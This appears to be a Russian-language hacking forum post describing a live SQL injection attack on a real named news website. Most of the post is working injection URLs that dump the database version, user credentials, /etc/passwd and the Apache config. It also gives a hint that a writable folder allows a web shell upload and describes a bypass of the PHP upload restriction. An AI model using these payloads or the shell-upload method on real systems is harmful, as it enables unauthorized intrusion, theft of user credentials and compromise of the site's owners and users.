http://www.standard.md/pageview.php?l=ru&idc=-1'+union+select+version()/*
как бэ вывод в заголовке
Пончик, ты забыл там кавычку поставить

http://www.standard.md/pageview.php?l=ru&idc=-1'+union+select+concat(username,':',password)+from +users/*

http://www.standard.md/pageview.php?l=ru&idc=-1'+union+select+load_file('/etc/passwd')+from+users/*
Так как там фряха, можно средствами load_file читать дериктории, находим httpd.conf
http://www.standard.md/pageview.php?l=ru&idc=-1'+union+select+load_file('/usr/local/etc/apache2/httpd.conf')+from+users/*
Смотри сорц, находим строку
DocumentRoot "/usr/home/insm/www"
читаем эту диру
http://www.standard.md/pageview.php?l=ru&idc=-1'+union+select+load_file('/usr/home/insm/www')+from+users/*
Щас копаю, воде в веб нельзя залить файл
PS нашёл, папка public доступна на запись))
Вобще ссылку на шелл кидать не буду, те кто умеют зальют =)

Safe mode: OFF
Disable functions: 0
OS: FreeBSD gw.standard.md 5.2.1-RELEASE-p11 FreeBSD 5.2.1-RELEASE-p11 #0: Fri Oct 15 09:17:15 EEST 2004 sv@gw.standard.md:/usr/obj/usr/src/sys/standard.v0 i386

PPS если чё, то там allow_url_fopen = On и в штацессе закрыт доступ к php файлам, решается заливкой phtml

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands